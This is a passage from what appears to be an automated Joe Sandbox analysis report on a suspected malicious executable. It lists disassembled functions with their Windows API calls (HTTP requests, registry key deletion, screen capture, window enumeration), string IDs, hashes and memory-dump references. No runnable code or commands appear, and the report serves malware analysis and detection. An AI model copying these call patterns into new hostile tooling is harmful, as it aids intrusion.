                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 221274066-3440237614
                                                      • Opcode ID: 2be2f2688ef28631523ead18f0b79278dff0e761e8578e05d8e2754e4038f234
                                                      • Instruction ID: d6851be945adcd1bb1e7c941001faa8e6bf6d89c42eee5fe125191cb762401e2
                                                      • Opcode Fuzzy Hash: 2be2f2688ef28631523ead18f0b79278dff0e761e8578e05d8e2754e4038f234
                                                      • Instruction Fuzzy Hash: AF617B71108305AFD701DF61DC85DAFBBE9EF88350F000A1DF595931A1DBB09A49EBA2
                                                      Function 00F9C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F9C4B0
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F9C4C3
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F9C4D7
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F9C4F0
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00F9C533
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F9C549
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F9C554
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F9C584
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F9C5DC
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F9C5F0
                                                      • InternetCloseHandle.WININET(00000000), ref: 00F9C5FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                      • String ID:
                                                      • API String ID: 3800310941-3916222277
                                                      • Opcode ID: 2a43b0d1dee507f7d79d678893f182c97c0699413455a5697b39088583ab1819
                                                      • Instruction ID: a2697d64bd4740b6b94d937839669b8798f5a93c1ec7734a3b544e1e259fef56
                                                      • Opcode Fuzzy Hash: 2a43b0d1dee507f7d79d678893f182c97c0699413455a5697b39088583ab1819
                                                      • Instruction Fuzzy Hash: 7E5139B1600209BFEF219F65CD88AAB7BFCFB08754F144519F94696250DB34EA44AFA0
                                                      Function 00FB856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00FB8592
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85A2
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85AD
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85BA
                                                      • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85C8
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85D7
                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85E0
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85E7
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85F8
                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00FBFC38,?), ref: 00FB8611
                                                      • GlobalFree.KERNEL32(00000000), ref: 00FB8621
                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00FB8641
                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00FB8671
                                                      • DeleteObject.GDI32(?), ref: 00FB8699
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FB86AF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      • Opcode ID: 6ab6039c6d4a1be3e885031fa80b82967fe6686eea86c5fda0e1fae7ec8d2d93
                                                      • Instruction ID: 1c618b6ed4f576520d97fa3b6f702861309911d5d9b2e8eaa1c989191e32ed56
                                                      • Opcode Fuzzy Hash: 6ab6039c6d4a1be3e885031fa80b82967fe6686eea86c5fda0e1fae7ec8d2d93
                                                      • Instruction Fuzzy Hash: AF411975600209AFDB119FA5CC88EAB7BBDEF89761F144159F909E7260DB309D01EF60
                                                      Function 00F914BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000000), ref: 00F91502
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00F9150B
                                                      • VariantClear.OLEAUT32(?), ref: 00F91517
                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F915FB
                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00F91657
                                                      • VariantInit.OLEAUT32(?), ref: 00F91708
                                                      • SysFreeString.OLEAUT32(?), ref: 00F9178C
                                                      • VariantClear.OLEAUT32(?), ref: 00F917D8
                                                      • VariantClear.OLEAUT32(?), ref: 00F917E7
                                                      • VariantInit.OLEAUT32(00000000), ref: 00F91823
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                      • API String ID: 1234038744-3931177956
                                                      • Opcode ID: 1152face8039a469a5ccb578385c237458960eed493153088b3a36bdcececbef
                                                      • Instruction ID: dccd6ef1e56764f91bfb90eff5d1f747808ea57a3afecac984c4c7b56799d1d7
                                                      • Opcode Fuzzy Hash: 1152face8039a469a5ccb578385c237458960eed493153088b3a36bdcececbef
                                                      • Instruction Fuzzy Hash: 9CD10032A00116DBEF009F65E884B7DB7B5BF44710F1A8066F446AB290DB38DD45FBA2
                                                      Function 00FAB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00FAC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FAB6AE,?,?), ref: 00FAC9B5
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FAC9F1
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FACA68
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FACA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FAB6F4
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FAB772
                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00FAB80A
                                                      • RegCloseKey.ADVAPI32(?), ref: 00FAB87E
                                                      • RegCloseKey.ADVAPI32(?), ref: 00FAB89C
                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00FAB8F2
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00FAB904
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00FAB922
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00FAB983
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FAB994
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 146587525-4033151799
                                                      • Opcode ID: 8ff7e1e80caec06fbdd5e0349faea744a2f404c110574d0c67607ecf704b4aab
                                                      • Instruction ID: 90b63b59a30a0f9d7550840c3c30d444b991dd488b01e3f6d8baa79bf4fbb789
                                                      • Opcode Fuzzy Hash: 8ff7e1e80caec06fbdd5e0349faea744a2f404c110574d0c67607ecf704b4aab
                                                      • Instruction Fuzzy Hash: ABC19E71608201AFD710DF14C894F2ABBE5BF89318F14855CF49A8B2A3CB75EC46EB91
                                                      Function 00FA255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00FA25D8
                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00FA25E8
                                                      • CreateCompatibleDC.GDI32(?), ref: 00FA25F4
                                                      • SelectObject.GDI32(00000000,?), ref: 00FA2601
                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00FA266D
                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00FA26AC
                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00FA26D0
                                                      • SelectObject.GDI32(?,?), ref: 00FA26D8
                                                      • DeleteObject.GDI32(?), ref: 00FA26E1
                                                      • DeleteDC.GDI32(?), ref: 00FA26E8
                                                      • ReleaseDC.USER32(00000000,?), ref: 00FA26F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: bc1ea4dedea6df378971f0c3fcafe73a315b684856596d162f1b386d16a6d358
                                                      • Instruction ID: e6f464ee0240d95115acccdd13381202a428bf8966687533354d2a14d487bc4f
                                                      • Opcode Fuzzy Hash: bc1ea4dedea6df378971f0c3fcafe73a315b684856596d162f1b386d16a6d358
                                                      • Instruction Fuzzy Hash: 6661D2B5E00219EFCF04CFA8DD84AAEBBB5FF48310F208529E955A7250D774A941DFA0
                                                      Function 00F5DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 00F5DAA1
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D659
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D66B
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D67D
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D68F
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D6A1
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D6B3
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D6C5
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D6D7
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D6E9
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D6FB
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D70D
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D71F
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D731
                                                      • _free.LIBCMT ref: 00F5DA96
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      • _free.LIBCMT ref: 00F5DAB8
                                                      • _free.LIBCMT ref: 00F5DACD
                                                      • _free.LIBCMT ref: 00F5DAD8
                                                      • _free.LIBCMT ref: 00F5DAFA
                                                      • _free.LIBCMT ref: 00F5DB0D
                                                      • _free.LIBCMT ref: 00F5DB1B
                                                      • _free.LIBCMT ref: 00F5DB26
                                                      • _free.LIBCMT ref: 00F5DB5E
                                                      • _free.LIBCMT ref: 00F5DB65
                                                      • _free.LIBCMT ref: 00F5DB82
                                                      • _free.LIBCMT ref: 00F5DB9A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: d5ac04cc035d3fc3882127f16548cb2a409fc2126cc29d17698d875778b65838
                                                      • Instruction ID: a0bdbf602bf3ae12d03747e62ee5f240c5dcb811ac8db21a9b88e72dc878fa89
                                                      • Opcode Fuzzy Hash: d5ac04cc035d3fc3882127f16548cb2a409fc2126cc29d17698d875778b65838
                                                      • Instruction Fuzzy Hash: 12317E31A05304AFDB31AA39EC41B9677E9FF41322F114519FA48E7292DB39AC48F720
                                                      Function 00F8365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00F8369C
                                                      • _wcslen.LIBCMT ref: 00F836A7
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F83797
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00F8380C
                                                      • GetDlgCtrlID.USER32(?), ref: 00F8385D
                                                      • GetWindowRect.USER32(?,?), ref: 00F83882
                                                      • GetParent.USER32(?), ref: 00F838A0
                                                      • ScreenToClient.USER32(00000000), ref: 00F838A7
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00F83921
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00F8395D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                      • String ID: %s%u
                                                      • API String ID: 4010501982-679674701
                                                      • Opcode ID: 009372c7966801c71e651fd3868a66b7b81bfe9deb4b9a20eec811912cda30ef
                                                      • Instruction ID: a6f4d6e4297d7fef52491e61b870fc86b299bb91252f88b209650742a4f4a497
                                                      • Opcode Fuzzy Hash: 009372c7966801c71e651fd3868a66b7b81bfe9deb4b9a20eec811912cda30ef
                                                      • Instruction Fuzzy Hash: A291E671604606AFD714EF24C885FEAF7A9FF44B10F004629F999C21A0DB34EA45EB91
                                                      Function 00F84954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00F84994
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00F849DA
                                                      • _wcslen.LIBCMT ref: 00F849EB
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00F849F7
                                                      • _wcsstr.LIBVCRUNTIME ref: 00F84A2C
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00F84A64
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00F84A9D
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00F84AE6
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00F84B20
                                                      • GetWindowRect.USER32(?,?), ref: 00F84B8B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                      • String ID: ThumbnailClass
                                                      • API String ID: 1311036022-1241985126
                                                      • Opcode ID: 84645fe2a5bda79abca93f68b3b85b99070b87ca66ec85f5e2e8b7ececa50d06
                                                      • Instruction ID: 117062845a31fc25f56a00a7f5a44ac629fa4595ee5c1bf58a744c03b6e9a3be
                                                      • Opcode Fuzzy Hash: 84645fe2a5bda79abca93f68b3b85b99070b87ca66ec85f5e2e8b7ececa50d06
                                                      • Instruction Fuzzy Hash: 1191C03150820A9FDB04EF14C981FEA77E9FF84324F04846AFD859A096DB34ED45EBA1
                                                      Function 00FB8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FB8D5A
                                                      • GetFocus.USER32 ref: 00FB8D6A
                                                      • GetDlgCtrlID.USER32(00000000), ref: 00FB8D75
                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00FB8E1D
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00FB8ECF
                                                      • GetMenuItemCount.USER32(?), ref: 00FB8EEC
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00FB8EFC
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00FB8F2E
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00FB8F70
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FB8FA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                      • String ID: 0
                                                      • API String ID: 1026556194-4108050209
                                                      • Opcode ID: b03b9b9c3b4c3e60a2b4000aa34cfedbe28638ef5125e80078bd614234e4921b
                                                      • Instruction ID: 7cde950a4a44dbf34365edc4e2f45c821882eaf187b4450b3499df4d347da348
                                                      • Opcode Fuzzy Hash: b03b9b9c3b4c3e60a2b4000aa34cfedbe28638ef5125e80078bd614234e4921b
                                                      • Instruction Fuzzy Hash: 26817D719043059BDB20DF15D884AEBBBEDFBC83A4F140619F98597291DB70D902EFA1
                                                      Function 00FACC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00FACC64
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00FACC8D
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00FACD48
                                                        • Part of subcall function 00FACC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00FACCAA
                                                        • Part of subcall function 00FACC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00FACCBD
                                                        • Part of subcall function 00FACC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00FACCCF
                                                        • Part of subcall function 00FACC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00FACD05
                                                        • Part of subcall function 00FACC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00FACD28
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00FACCF3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2734957052-4033151799
                                                      • Opcode ID: 9bc5d48e00535c9c40d82682194761edab6d4f462117539682ce825fc857a795
                                                      • Instruction ID: 950778eec097584dc51556c72518726d505339aa3010cb672d0c92321939f3d2
                                                      • Opcode Fuzzy Hash: 9bc5d48e00535c9c40d82682194761edab6d4f462117539682ce825fc857a795
                                                      • Instruction Fuzzy Hash: DA316BB190112CBBDB209B55DC88EEFBB7CEF16760F000165F916E2240DA749A45AAE0
                                                      Function 00F8E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00F8E6B4
                                                        • Part of subcall function 00F3E551: timeGetTime.WINMM(?,?,00F8E6D4), ref: 00F3E555
                                                      • Sleep.KERNEL32(0000000A), ref: 00F8E6E1
                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00F8E705
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F8E727
                                                      • SetActiveWindow.USER32 ref: 00F8E746
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F8E754
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F8E773
                                                      • Sleep.KERNEL32(000000FA), ref: 00F8E77E
                                                      • IsWindow.USER32 ref: 00F8E78A
                                                      • EndDialog.USER32(00000000), ref: 00F8E79B
                                                      Strings
                                                      Memory Dump Source
